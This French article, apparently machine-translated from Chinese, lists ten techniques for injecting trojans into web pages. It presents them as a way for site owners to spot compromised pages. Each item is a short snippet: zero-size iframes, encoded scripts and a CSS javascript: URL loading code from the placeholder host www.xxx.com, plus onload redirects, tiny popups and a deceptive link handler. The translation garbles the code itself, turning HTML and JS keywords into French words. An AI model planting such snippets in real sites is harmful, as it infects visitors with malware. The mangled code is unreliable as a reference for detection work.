Cet article vous explique les méthodes que les méchants utilisent souvent pour bloquer les chevaux de Troie sur les pages Web, afin que vous puissiez empêcher vos propres pages Web. Tant que vous détectez ces endroits qui sont souvent utilisés pour bloquer les chevaux de Troie, il est facile de trouver leur emplacement. des Troyens.
1 : Cadre cheval suspendu
<iframe src=adresse largeur=0 hauteur=0></iframe>
Vous pouvez saisir des liens vers des sites Web malveillants à l'adresse, etc.
Deux : montage du fichier js
Tant qu'il s'agit d'un fichier JS, il peut être modifié de manière malveillante et ainsi être lié à du code malveillant. Généralement, le code JS référencé par l'ensemble du site est plus susceptible d'être lié à des chevaux de Troie. Pour la détection, nous pouvons examiner. la gauche ou le bas du code JS. Les méchants aiment combiner du code malveillant avec des codes normaux qui sont masqués avec beaucoup d'espaces ou de retours chariot, vous devriez donc vérifier si la page de codes JS a été intentionnellement étirée.
Troisièmement : le chiffrement de déformation js
<SCRIPT langage=JScript.Encode src=http://www.xxx.com/muma.txt></script>
muma.txt peut être remplacé par n'importe quel suffixe
Quatre : corps de cheval suspendu
<body onload=window.location='adresse';></body>
Cinq : Cheval caché suspendu
top.document.body.innerHTML = top.document.body.innerHTML + '/r/n<iframe src=http://www.xxx.com/muma.htm/></iframe>';
Six : Cheval suspendu en CSS
corps {
image d'arrière-plan : url('javascript:document.write(<script src=http://www.XXX.net/muma.js></script>)')}
Cette méthode est plus impitoyable et plus difficile à détecter.
Sept : cheval suspendu JAJA
<langage SCRIPT=javascript>
window.open (adresse,,toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1);
</script>
Huit : Déguisement en image
<html>
<iframe src=网马地址 height=0 width=0></iframe>
<img src=adresse de l'image></center>
</html>
Neuf : Appel déguisé
<lignes du jeu de cadres=444,0 cols=*>
<frame src=Ouvrir la page Web framborder=no scrolling=auto noresize marginwidth=0margingheight=0>
<frame src=网马地址 frameborder=no scrolling=no noresize marginwidth=0margingheight=0>
</frameset>
Dix : Déception avancée
<a href=http://www.163.com (confond l'adresse de connexion et montre que cette adresse pointe vers l'adresse du cheval de Troie) onMouseOver=www_163_com(); return true;> Contenu à afficher sur la page</a>
<Langage SCRIPT=JavaScript>
fonction www_163_com ()
{
var url=adresse nette du cheval ;
open(url,NewWindow,toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizing=no,copyhistory=yes,width=800,height=600,left=10, haut=10);
}
</SCRIPT>